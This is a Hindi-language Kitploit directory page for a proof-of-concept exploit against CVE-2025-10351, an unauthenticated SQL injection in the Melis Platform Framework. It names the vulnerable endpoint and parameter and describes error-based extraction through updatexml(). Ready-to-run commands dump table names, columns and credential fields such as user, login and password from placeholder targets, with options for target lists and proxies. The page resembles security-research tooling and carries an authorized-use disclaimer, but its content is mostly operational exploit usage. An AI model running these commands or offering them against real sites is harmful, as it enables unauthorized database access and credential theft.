Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-10351-POC — CVE-2025-10351 के लिए एक्सप्लॉइट। Melis Platform Framework पर SQL इंजेक्शन। | Kitploit
उपकरण/GitHubGitHub/ivansmc/cve-2025-10351-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

CVE-2025-10351 के लिए एक्सप्लॉइट। Melis Platform Framework पर SQL इंजेक्शन।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-10351 POC - SQL इंजेक्शन एक्सप्लॉइट 💉

CVE-2025-10351 के लिए POC: एक ऐसी बिना प्रमाणीकरण वाली SQL इंजेक्शन भेद्यता जो Melis Platform Framework में एक विशिष्ट एंडपॉइंट को प्रभावित करती है।

status python status


🔗 संदर्भ

  • 📄 MITRE पर CVE-2025-10351
  • 📄 INCIBE (स्पेनिश राष्ट्रीय साइबर सुरक्षा संस्थान) पर Melis Platform चेतावनी

🚀 विवरण

यह POC एंडपॉइंट में बिना प्रमाणीकरण वाली error-based SQL इंजेक्शन भेद्यता को लक्षित करता है:

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

यह निम्न को निकालने के लिए MySQL में updatexml() का उपयोग करता है:

  • टेबल नाम
  • कॉलम नाम
  • विशिष्ट या सभी कॉलमों से डेटा

यह आगे मैन्युअल शोषण के लिए संभावित time-based SQLi वेक्टरों का भी पता लगाता है।


🛠️ आवश्यकताएँ

निर्भरताएँ इस प्रकार स्थापित करें:

root@kitploit:~
pip3 install -r requirements.txt

🧪 उपयोग

बुनियादी जाँच

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

URL सूची से

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

सभी टेबल नाम निकालें

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

किसी टेबल से सभी कॉलम नाम निकालें

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

सभी कॉलमों से सारा डेटा निकालें

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

विशिष्ट कॉलम निकालें

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

proxy का उपयोग insecure मोड, कुकीज़ और डीबग मोड के साथ करें

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ विकल्प


📤 आउटपुट

  • निकाली गई टेबलें tables_extracted.txt में सहेजी गईं
  • निकाला गया डेटा <table_name>_data.txt में सहेजा गया

⚠️ अस्वीकरण

यह दस्तावेज़ केवल अधिकृत सुरक्षा परीक्षण और सुधार के लिए है। उन सिस्टमों के विरुद्ध PoC या पुनरुत्पादन चरणों का उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।


Manuel Iván San Martín Castillo द्वारा ❤️ के साथ निर्मित

टूल डाउनलोड करें
ArgumentDescription
-uलक्ष्य URL
-pपोर्ट (80, 443, आदि)
-lURL सूची वाली फ़ाइल
-stime-based परीक्षणों के लिए प्रतीक्षा समय (डिफ़ॉल्ट: 1s)
-atसभी टेबल नाम डंप करें
-tटेबल नाम निर्दिष्ट करें
-acदिए गए टेबल के सभी कॉलम डंप करें
-cडंप करने के लिए कॉलमों की अल्पविराम-पृथक सूची
--proxyBurp Proxy http://127.0.0.1:8080
--insecureproxy कनेक्शन का उपयोग करते समय TLS जाँच अक्षम करें
--cookieप्रमाणीकरण अनुरोधों के लिए कुकीज़
--debugडीबग मोड